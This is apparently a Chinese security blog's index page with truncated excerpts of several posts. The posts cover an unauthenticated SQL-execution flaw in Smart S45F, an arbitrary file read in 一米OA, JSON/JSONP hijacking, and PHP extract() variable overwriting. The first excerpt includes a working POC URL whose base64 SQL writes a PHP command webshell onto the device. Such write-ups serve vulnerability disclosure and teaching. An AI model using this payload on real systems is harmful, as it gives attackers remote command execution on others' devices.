原理SQL语句执行接口未授权访问,可执行任意SQL语句。影响范围Smart S45F危害远程攻击者可利用该漏洞执行任意SQL语句,包括写入webshell。POC & EXP手工漏洞位置:https://ip:port/importexport.php该接口可以使用GET参数执行SQL语句参数sql=base64编码的SQL语句 参数type=exportexcelbysql,执行动作 POC:1https://ip:port/importexport.php?sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc2VjLnBocCc=&type=exportexcelbysql base64: select 0x3c3f706870206563686f2073797374656d28245f504f53545b2263
漏洞描述一米OA getfile.jsp文件过滤不足且对权限验证不严格,导致任意文件读取漏洞。漏洞影响一米OA网络测绘app="一米OA"漏洞复现出现漏洞的文件如下:<%@ page contentType="text/html;charset=utf-8" %> <%@page import="cn.js.fan.util.*" %> <%@page import="cn.js.fan.web.Global" %> <%@page import="com.redmoon.oa.*" %> <%@page import="java.io.*" %> <jsp:useBean id="fchar" scope="page" class="cn.js.fan.util.StrUtil"/> <jsp:useBean id="f
简介恶意攻击者通过某些特定的手段,将本应该返回给用户的JSON数据进行拦截,转而将数据发送回给恶意攻击者。一般来说进行劫持的JSON数据都是包含敏感信息或者有价值的数据。分类属于CSRF漏洞。JSON劫持原理条件受攻击的网站URL返回一个JSON对象或者数组。受攻击的网站能够通过GET请求返回JSON数据(最方便),POST也行不过需要钓鱼诱导。受害人的浏览器没有禁用javascript。受害人浏览了钓鱼/恶意网站,并且受害人在受攻击的网站中,保存在COOKIE中的身份验证信息尚未清除。受攻击的站点没有做相关的防御措施。分类主要有两类:JSON劫持:主流浏览器有一定的防护、构造方法较为麻烦。JSONP劫持:JSONP是一种非官方的JSON劫持场景攻击手法这个劫持的原理是利用了<script>标签会自动执行js代码的原理,从而调用页面内嵌的恶意函数,将数据发送至攻击者的服务器。从而导致信息泄露。但是现在主流的浏览器都对这种类型的JSON劫持进行了一定的防御,未能成功复现,故可能无效。场景:服务端(http://A.xx/getjson)header('Content-type
前置知识可变变量这是PHP的一个特性,允许一个变量中的内容作为变量名使用,作用上类似于其他的指针。代码示例$a = "Cat"; $b = "a"; $$b = "Dog"; echo $a;运行结果:Dogextract()函数extract()函数从数组中将变量导入到当前的符号表。该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。该函数返回成功设置的变量数目。用PHP代码进行实现的话:foreach($my_array as $x => $y) { $$x = $y; }参考: 菜鸟教程代码示例$a = "Original"; $my_array = array("a" => "Cat","b" => "Dog", "c" => "Horse"); extract($my_array); e
最近老爸老妈来了,请他们吃好吃的,顺便改善一下我的饮食🥳
Equinox
一个乐于分享的网安人